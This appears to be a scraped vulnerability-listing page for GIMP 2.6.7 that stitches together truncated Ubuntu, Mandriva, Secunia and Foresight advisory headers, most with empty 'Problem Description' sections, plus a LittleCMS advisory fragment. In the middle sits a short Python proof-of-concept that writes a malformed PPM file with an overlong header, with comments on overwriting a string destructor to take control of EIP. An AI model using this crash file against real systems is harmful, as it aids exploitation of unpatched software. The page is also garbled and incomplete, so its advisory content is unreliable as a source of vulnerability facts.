Gimp 2.6.7
===========================================================
Ubuntu Security Notice USN-880-1 January 07, 2010
gimp vulnerabilities
CVE-2009-1570, CVE-2009-3909
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
======================================================================
Secunia Research 17/11/2009
- Gimp PSD Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software
======================================================================
Secunia Research 12/11/2009
- Gimp BMP Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software
===========================================================
Ubuntu Security Notice USN-494-1 August 02, 2007
gimp vulnerability
CVE-2006-4519
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Mandriva Linux Security Advisory MDVSA-2009:296-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2008.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:332
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2009.1, 2010.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:296
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : November 13, 2009
Affected: 2009.1, 2010.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:332-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : April 28, 2010
Affected: 2009.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDKSA-2007:170
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : August 23, 2007
Affected: 2007.0, 2007.1, Corporate 3.0
_______________________________________________________________________
Problem Description:
Published: 2007-08-01
Rating: Minor
Updated Versions:
gimp=/foresight.rpath.org@fl:1-devel//1/2.3.19-1-1
group-dist=/foresight.rpath.org@fl:1-devel//1/1.3.2-0.6-5
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949
http://issues.foresightlinux.org/browse/FL-457
Desktop i386
import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
# doesn't return immediately, and we must modify internal variables to
# cause an overwrite of a C++ string destructor executed at the end of the
# function to gain control of EIP
Background
==========
LittleCMS, or short lcms, is a color management system for working with
ICC profiles. It is used by many applications including GIMP and
Firefox.
Affected packages
=================
errors as well as dangerous memory leaks. Decoding a specially crafted
image file will result in unexpected process termination, Denial Of
Service conditions or arbitrary code execution due to stack overflow.
LittleCMS is used by several Open Source projects including OpenJDK,
Firefox and GIMP.
Affected version:
LittleCMS <= 1.17